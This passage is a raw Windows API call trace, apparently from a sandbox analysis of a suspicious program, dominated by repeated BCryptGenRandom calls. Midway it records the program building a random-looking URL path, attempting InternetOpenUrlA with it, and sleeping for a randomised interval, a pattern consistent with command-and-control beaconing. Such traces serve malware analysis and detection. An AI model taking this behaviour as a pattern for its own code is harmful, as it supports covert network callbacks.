lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a019d3, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a019d3) returned 0x0 [0253.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.531] GetProcessHeap () returned 0x440000 [0253.531] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0253.531] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0253.531] lstrcatA (in: lpString1="\x04", lpString2="/ckYBCmy4n2494n5k9Jq9uilquG4w3w71xsapWq5v9ou0bn/pX7p9xWty8bzYqWerr4g/zmdZlleDIjdNb84ji/4brlt9h0zz6tA797qbhk47k5klC5m0pjybVR8mmz5O6/D7k4s1ou5boi4l2dJLnqjt2af/" | out: lpString1="\x04/ckYBCmy4n2494n5k9Jq9uilquG4w3w71xsapWq5v9ou0bn/pX7p9xWty8bzYqWerr4g/zmdZlleDIjdNb84ji/4brlt9h0zz6tA797qbhk47k5klC5m0pjybVR8mmz5O6/D7k4s1ou5boi4l2dJLnqjt2af/") returned="\x04/ckYBCmy4n2494n5k9Jq9uilquG4w3w71xsapWq5v9ou0bn/pX7p9xWty8bzYqWerr4g/zmdZlleDIjdNb84ji/4brlt9h0zz6tA797qbhk47k5klC5m0pjybVR8mmz5O6/D7k4s1ou5boi4l2dJLnqjt2af/" [0253.531] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0253.531] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/ckYBCmy4n2494n5k9Jq9uilquG4w3w71xsapWq5v9ou0bn/pX7p9xWty8bzYqWerr4g/zmdZlleDIjdNb84ji/4brlt9h0zz6tA797qbhk47k5klC5m0pjybVR8mmz5O6/D7k4s1ou5boi4l2dJLnqjt2af/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0253.532] GetProcessHeap () returned 0x440000 [0253.532] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0253.532] GetProcessHeap () returned 0x440000 [0253.532] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01950 | out: hHeap=0x440000) returned 1 [0253.532] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0253.532] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0253.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0253.532] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0253.532] Sleep (dwMilliseconds=0x18faf) [0253.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0253.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.873] GetProcessHeap () returned 0x440000 [0253.873] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b2c0 [0253.873] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2c1, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a1b2c1) returned 0x0 [0253.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.874] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.875] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.876] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.876] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.877] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.877] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.878] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.879] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.879] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0253.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b2e6, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a1b2e6) returned 0x0 [0253.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.880] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0253.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.881] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0253.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0253.882] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.119] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.120] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.120] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.121] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.121] GetProcAddress 